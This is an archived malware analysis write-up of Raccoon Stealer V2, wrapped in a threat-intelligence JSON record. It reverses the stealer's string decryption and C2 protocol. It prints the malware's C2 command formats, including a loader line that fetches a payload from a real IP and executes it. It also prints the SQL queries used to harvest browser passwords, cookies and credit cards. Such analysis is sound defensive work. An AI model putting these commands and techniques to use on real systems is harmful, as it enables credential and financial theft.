{
	"id": "ed389411-bec7-4307-b193-2d7debc8ce2c",
	"created_at": "2026-04-06T00:12:17.529279Z",
	"updated_at": "2026-04-10T13:12:47.004205Z",
	"deleted_at": null,
	"sha1_hash": "66a055a502dcbd9b8cec3bb9cc0301ad4ce34c37",
	"title": "Raccoon Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 783828,
	"plain_text": "Raccoon Stealer\r\nBy Mohamed Adel\r\nPublished: 2022-09-12 · Archived: 2026-04-05 15:34:15 UTC\r\nRaccoon Stealer V2 (or RecordBreaker) Is a stealer that provided as a service with about 200$/m. It is a new version of\r\nRaccoon stealer that appeared in 2019 and died for a while then it returns with this new Stealer which known as\r\nRecordBreaker.\r\nIt Comes with a lot of capabilities, It can grab a lot of sensitive information like :\r\n1. Steal Victim System information\r\n2. Steal Victim Username and passwords stored in the browser\r\n3. Steal Victim Browser’s Autofill Information\r\n4. Steal Credit Card information\r\n5. Steal Crypto wallets Information\r\n6. Steal Bitcoin Wallets\r\n7. Grab any file from the victim system\r\n8. Take Screenshots from the victim system\r\n9. Load next stage\r\nFirst we start with basic analysis, using Detect it easy we see that the file seems to be not packed. Exploring the strings tab,\r\nwe see a lot of base64 encoded strings and two registry keys SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall and\r\nSOFTWARE\\Microsoft\\Cryptography\r\nStrings\r\ntrying to encode the base64 strings will produce encrypted data so i think thats all with basic insights about the executable\r\nand lets upload the sample to IDA (and ghidra for decompiling)\r\nDynamically resolving DLLs and APIs\r\nIn the entry function we see two function calls at the very beginning to sub_401000 and sub_404036 . by navigating to\r\nsub_401000 we see that this function resolve the required APIs\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 1 of 18\n\ndll loaded\r\nAfter going back to to the entry function, After resolving the APIs there is another function call sub_404036 . This function\r\ntakes a pattern that seems to be decrypting the data. The sequence is a call to sub_00401806 that calls\r\nCryptStringToBinaryA after calling LstrLenA . The call to CryptStringToBinaryA takes a the dwFlags parameter\r\n0x00000001 (CRYPT_STRING_BASE64) which decode the string using base64 encoding routine and returns a byte array\r\ncontains the base64-decoded encrypted data.\r\ndecrypt\r\nafter decrypting the string there are calls to sub_0040A59A function that convert the resulting strings to unicode strings by\r\ncalling MultiByteToWideChar\r\nto get all the decrypted strings we can use the debugger or by making a script to decrypt them for us\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 2 of 18\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\nimport base64\r\nfrom Crypto.Cipher import ARC4\r\nstrings = [ 'fVQMox8c','bE8Yjg==','bkoJoy0=','LEtihSAW6eunMDV+Aes3rVhAClFoaQM=',...,'59c9737264c0b3209d9193b8ded6c127','XVHmGYV5cH1pvOC\r\nkey = \"edinayarossiya\".encode('utf-8')\r\nfor i in strings:\r\ncipher = ARC4.new(key)\r\nprint(cipher.decrypt(base64.b64decode(i.encode('utf-8'))))\r\nthe decrypted strings:\r\n 1\r\n 2\r\n 3\r\n 4\r\n 5\r\n 6\r\n 7\r\n 8\r\n 9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\ntlgrm_\r\news_\r\ngrbr_\r\n%s\\tTRUE\\t%s\\t%s\\t%s\\t%s\\t%s\\n\r\nURL:%s\\nUSR:%s\\nPASS:%s\\n\r\n\\t\\t%d) %s\\n\r\n\\t- Locale: %s\\n\r\n\\t- OS: %s\\n\r\n\\t- RAM: %d MB\\n\r\n\\t- Time zone: %c%ld minutes from GMT\\n\r\n\\t- Display size: %dx%d\\n\r\n\\t- Architecture: x%d\\n\r\n\\t- CPU: %s (%d cores)\\n\r\n\\t- Display Devices:\\n%s\\n\r\nformhistory.sqlite\r\nlogins.json\r\n\\\\autofill.txt\r\n\\\\cookies.txt\r\n\\\\passwords.txt\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Type: multipart/form-data; boundary=\r\nContent-Type: text/plain;\r\nUser Data\r\nwallets\r\nwlts_\r\nldr_\r\nscrnsht_\r\nsstmnfo_\r\ntoken:\r\nnss3.dll\r\nsqlite3.dll\r\nSOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\r\nPATH\r\nProductName\r\nWeb Data\r\nsqlite3_prepare_v2\r\nsqlite3_open16\r\nsqlite3_close\r\nsqlite3_step\r\nsqlite3_finalize\r\nsqlite3_column_text16\r\nsqlite3_column_bytes16\r\nsqlite3_column_blob\r\nSELECT origin_url, username_value, password_value FROM logins\r\nSELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies\r\nSELECT name, value FROM autofill\r\npera\r\nStable\r\nSELECT host, path, isSecure, expiry, name, value FROM moz_cookies\r\nSELECT fieldname, value FROM moz_formhistory\r\ncookies.sqlite\r\nmachineId=\r\n\u0026configId=\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 3 of 18\n\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n\"encrypted_key\":\"\r\nstats_version\":\"\r\nContent-Type: application/x-object\r\nContent-Disposition: form-data; name=\"file\"; filename=\"\r\nPOST\r\nMachineGuid\r\nimage/jpeg\r\nGdiPlus.dll\r\nGdi32.dll\r\nGdiplusStartup\r\nGdipDisposeImage\r\nGdipGetImageEncoders\r\nGdipGetImageEncodersSize\r\nGdipCreateBitmapFromHBITMAP\r\nGdipSaveImageToFile\r\nBitBlt\r\nCreateCompatibleBitmap\r\nCreateCompatibleDC\r\nDeleteObject\r\nGetObjectW\r\nSelectObject\r\nSetStretchBltMode\r\nStretchBlt\r\nSELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards\r\nNUM:%s\\nHOLDER:%s\\nEXP:%s/%s\\n\r\n\\\\CC.txt\r\nNSS_Init\r\nNSS_Shutdown\r\nPK11_GetInternalKeySlot\r\nPK11_FreeSlot\r\nPK11_Authenticate\r\nPK11SDR_Decrypt\r\nSECITEM_FreeItem\r\nhostname\":\"\r\n\",\"httpRealm\":\r\nencryptedUsername\":\"\r\n\",\"encryptedPassword\":\"\r\n\",\"guid\":\r\nProfiles\r\nb\"\\xee\\xefV\u003e\\x0c\\xb5Ge\\xb6,A\\xef\\x87=g)'\\x99\\x0c\\xbf7iT\\xfd\"\r\nb'Ti\\x8d\\xc8\\xf7:\\xdc\\x9f\\xeb\\xff\\xdc\\xef\\xb1\\x154\\xb4*\\x00\\x87\\xd9\\xf0q'\r\nas we can see, the last two strings seems not to be decrypted. If we go back the start function we see that the string\r\n59c9737264c0b3209d9193b8ded6c127 is a different key used to decrypt the string XVHmGYV5cH1pvOC0w/cmantl/oG9aw== and\r\nthe decrypted string is\r\nthere are some other decryption routines using the same key but the strings are empty.\r\nthen, the attacker retrieves the locale name which is \u003clanguage\u003e-\u003cREGION\u003e and compare it against ru for some reason,\r\nbut the flow didn’t changed if it is!\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 4 of 18\n\nThe attacker open a mutex with a name 8724643052 and if it existed, the malware terminate itself and if it is not existed it\r\ncreates a mutex with that name.\r\nThe next call is to check if the victim running as local system by making a call to GetTokenInformation to retrieve the\r\ntoken user data that include SID and then check this SID with S-1-5-18 to see if the user is running as a LocalSystem or\r\nnot. If it is, the function returns 1 and not returns 0\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 5 of 18\n\nThe next few instruction retrieves a decrypted strings: Content-Type: application/x-www-form-urlencoded; charset=utf-8 and */* then calls a function that formats the input with a given pattern, This function is referenced in a lot of places in\r\nthe sample.\r\nthis function format the input string with \\r\\n appended to it and calls the function that seems to be that does the\r\nformatting procedures and it’s used in so many places\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 6 of 18\n\nThen the malware make a call to a function sub_0040A720 after allocating two regions in the memory .if we navigate to\r\nthis function we see that it first reference the previously allocated memory and the open the registry key\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\ and read the value MachineGuid and returns it in EAX register\r\nthen the malware retrieves the username of the current user and makes some formatting to the data before sending it. The\r\nformatted data are some information about the victim machine like:\r\n1\r\n2\r\nmachineId=\u003cGUID\u003e|\u003cusername\u003e\u0026confId=\u003cpredefined value\u003e\r\nmachineId=d8874349-72d5-492c-8d8c-5e6d3a68e127|d01a\u0026configId=59c9737264c0b3209d9193b8ded6c127\r\nconfigId used is the key used to decrypt the C2 IP address . Now, the first piece of data is ready to be sent to the attacker and\r\nthe function sub_004079F3 did this. First, the function references the IP of the C2 server and make some comparisons to its\r\nbeginning to make sure that it’s in a valid format. Then it gets a pointer to / at the end of the IP address and then make a\r\ncall to InternetOpenW(\"record\",0,0,0) it parameter is the User-Agent of the request sent .now it’s ready to connect to the\r\nremote server, so it connects to the remote server over http transfer protocol and port 443, the default for https transfer\r\nprotocol\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 7 of 18\n\nThen it sends the data to the C2 server set before. The content type sent in the request in the form Content-Type:\r\napplication/x-www-form-urlencoded; charset=utf-8\\r\\n\\r\\n\\r\\n and the data sent in the OptionalHeader parameter\r\nwhich sent after the request headers. And after sending the data it waits for a response from the server. Then it parses the\r\nresponse for a specific field contain the word Token: if it found it continue running if it is not, it exits.\r\nIt search for the libs word in the response in order to prepare a legitimate DLL that are required for the malware to run.\r\nthe command can be in form:\r\n1\r\n2\r\nlibs_nss3:http://{HOSTADDR}/{RANDOM_STRING}/nss3.dll\r\nlibs_msvcp140:http://{HOSTADDR}/{RANDOM_STRING}/msvcp140.dll libs_vcruntime140:http://{HOSTADDR}/{RANDOM_STRING}/vcruntime140.dll\r\nThen, It retrieves the path of Local AppData C:\\Users\\d01a\\AppData\\Local by calling SHGetFolderPathW from the\r\nfunction sub_0040A323 and format it by adding the word Low at the end of the path then it adds the path to sqlite3.dll and\r\nother downloaded DLLs to the PATH environment variables\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 8 of 18\n\nThe malware collects information about the system through the function call a sub_004097BB , it search for the word\r\nsstmnfo_ in the response of the C2 Server and the data to be collected is determined in the response, after a colon : and\r\na pipe | between the key words of the data. Then, it begin collecting information about the system:\r\n1. The locale information the data is formatted in the following format - Locale:\r\n2. Time zone information the data is formatted in the form: - Time zone: \u003c%c%ld\u003e minutes from GMT\r\n3. OS Version retrieves the OS version by reading the registry key SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\ProductName and the data formatted in the form: - OS: \u003c%s OS\u003e\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 9 of 18\n\n4. system Architecture By calling GetSystemWow64DirectoryW that retrieves the path of of the system directory used by\r\nWOW64 that only exist in x64 Architecture. The data formated in form: - Architecture: x\u003c%d Architecture\u003e\r\n5. RAM status gets the memory status by calling GlobalMemoryStatusEx that retrieves both the virtual and physical\r\nmemory usage and format in the form: - RAM: \u003c%d RAM Usage\u003e MB\r\n6. CPU specifications Using instruction cpuid to retrieve the processor specification. This instruction output depends\r\non the value in the eax register. The call to cpuid with eax = 0x80000002 , 0x80000003 and 0x80000004 gets\r\nProcessor Brand String .Also it uses GetSystemInfo API to get the number of processors. And send it in the format:\r\n- CPU: \u003c%s CPU Brand\u003e (\u003c%d Cores number\u003e cores)\r\n7. Display Get the display information by calling GetSystemMetrics with index 0 to retrieves The width of the screen\r\nof the primary display monitor and format it in form: - Display size: \u003c%d\u003ex\u003c%d\u003e\r\n8. Display devices - Display Devices: \u003c%s\u003e\r\n9. Display Name And version Get this information from the registry\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall And the Specific GUID to get the display name and\r\nversion Then it generate a random value and append it to the content-Type header and save the data to a file to send it\r\nto the attacker C2 server\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 10 of 18\n\nThat’s all with sstmnfo_ expected functionality. Lets explore the rest of the capabilities of the malware.\r\nThe malware then Loads sqlite3.dll and call the function at sub_00403FAB . This function is basically allocates two\r\nregions of memory and get the paths of %AppData% and %LocalAppData% directories and then transfer the flow to another\r\nfunctions\r\nlets explore the first function call sub_401B13 . It recursively search for User Data directory and then goes to\r\nsub_401E26 that have all the functionality. It first start looking for Local State file and reads it and search for\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 11 of 18\n\n\"encrypted_key\":\" in it and in the same way, it did with stats_version\":\" .\r\nThen, It starts to resolve some functions from sqlite3.dll to use them. And get the path to Login Data file and copies it\r\nto another file.\r\nIt opens a new database connection to Login Data copied file with sqlite3_open function call then it execute SQL\r\nstatement:\r\n1 SELECT origin_url, username_value, password_value FROM logins\r\nto steal the saved username \u0026 password and its associated origin URL\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 12 of 18\n\nActually, To execute that SQL statement, sqlite3_step should be called. the return value of sqlite3_step can be\r\ndifferent so, it checks if the return value is 100 this means that there is another row of output is available. To retrieve the\r\ncontent of the database a call to sqlite3_column_bytes16 that returns the size of the data and sqlite3_column_text16 to\r\nthe content as plain text\r\nAfter collecting these data it format it in the following form in a file \\passwords.txt to send it: URL:%s USR:%s PASS:%s\r\nIn the same way, It get the cookies using the SQL statment:\r\n1 SELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies\r\nand format it in the following form in a file \\cookies.txt to send it: %s TRUE %s %s %s %s %s\r\nIt gets the autofill content name and value pairs in the same way using the SQL query\r\n1 SELECT name, value FROM autofill\r\nand saved the data to a file \\autofill.txt to send it.\r\nthen, it reads the content of Web Data file to extract Credit Card information using the SQL query:\r\n1 SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards\r\nand format in the following form in a file \\CC.txt to send it: NUM:%s HOLDER:%s EXP:%s/%s and it did the whole thing\r\nwith the files in Default path for the browser\r\nFireFox Browsers are a little bit different so, it collects the data from it but needs to do different steps. First it goes to\r\nProfiles and search for cookies.sqlite and it opens it using sqlite3 and get the cookies using SQL query:\r\n1 SELECT host, path, isSecure, expiry, name, value FROM moz_cookies\r\nthen, The login information from logins.json and dumping the passwords using PK11SDR_Decrypt function call.\r\nThen, it goes to formhistory.sqlite to get the Autofill information using SQL query:\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 13 of 18\n\n1 SELECT fieldname, value FROM moz_formhistory\r\nIf the response has the word wlts_ then, the malware tries to collect all crypto wallets information from the victim.\r\nBasically it navigate all the file system searching for a pattern. And in the same way, It navigate the whole system searching\r\nfor wallet.dat which is a bitcoin wallet. and if it found, sends it to the server.\r\nResponse be like:\r\n1\r\n2\r\n3\r\nwlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*\r\nwlts_atomic:Atomic;26;atomic;*;*cache*,*IndexedDB*\r\nwlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*\r\nIf the response has the word grbr_ search for the specified file in the system and upload it to the attacker. the response be\r\nlike:\r\n1\r\n2\r\n3\r\ngrbr_dekstop:%USERPROFILE%\\Desktop\\|*.txt, *.doc, *pdf*|-|5|1|0|files\r\ngrbr_documents:%USERPROFILE%\\Documents\\|*.txt, *.doc, *pdf*|-|5|1|0|files\r\ngrbr_downloads:%USERPROFILE%\\Downloads\\|*.txt, *.doc, *pdf*|-|5|1|0|files\r\nThe malware can collect Telegram Desktop application data if the response has the word tlgrm_ .\r\n1 tlgrm_Telegram:Telegram Desktop\\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*\r\nIt search for a file specified in the response from the server and navigate to it and copy it to send to the attacker.\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 14 of 18\n\nTo take a screenshot the response should have the word scrnsht_ . First, It resolves APIs from GdiPlus.dll and\r\nGdi32.dll to take a screenshot.\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 15 of 18\n\nAll APIs resolved:\r\n 1\r\n 2\r\n 3\r\n 4\r\n 5\r\n 6\r\n 7\r\n 8\r\n 9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n GdiplusStartup\r\n GdipDisposeImage\r\n GdipGetImageEncoders\r\n GdipGetImageEncodersSize\r\n GdipCreateBitmapFromHBITMAP\r\n GdipSaveImageToFile\r\n BitBlt\r\n CreateCompatibleBitmap\r\n CreateCompatibleDC\r\n DeleteObject\r\n GetObjectW\r\n SelectObject\r\n SetStretchBltMode\r\n StretchBlt\r\n DC\r\nThe malware uses these APIs to take a screenshots from the victim system and send them to the attacker\r\nThe malware can drop a next stage malware specified in the response from the server containing ldr_ .\r\n1 ldr_1:http://94.158.244.119/U4N9B5X5F5K2A0L4L4T5/84897964387342609301.bin|%TEMP%\\|exe\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 16 of 18\n\nThe malware open a connection to the server and download the content of the file specified in the response to the system\r\nThe malware then execute the downloaded file using ShellExecute API call\r\nThat’s all, The malware clear the files that created and release the allocated memory regions\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 17 of 18\n\nsha256: 022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03\r\n51.195.166[.]184\r\nhttps://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/\r\nhttps://bazaar.abuse.ch/sample/022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03/\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nhttps://www.sqlite.org/c3ref/funclist.html\r\nhttps://www.sqlite.org/rescode.html\r\nSource: https://d01a.github.io/raccoon-stealer/\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://d01a.github.io/raccoon-stealer/"
	],
	"report_names": [
		"raccoon-stealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434337,
	"ts_updated_at": 1775826767,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/66a055a502dcbd9b8cec3bb9cc0301ad4ce34c37.pdf",
		"text": "https://archive.orkl.eu/66a055a502dcbd9b8cec3bb9cc0301ad4ce34c37.txt",
		"img": "https://archive.orkl.eu/66a055a502dcbd9b8cec3bb9cc0301ad4ce34c37.jpg"
	}
}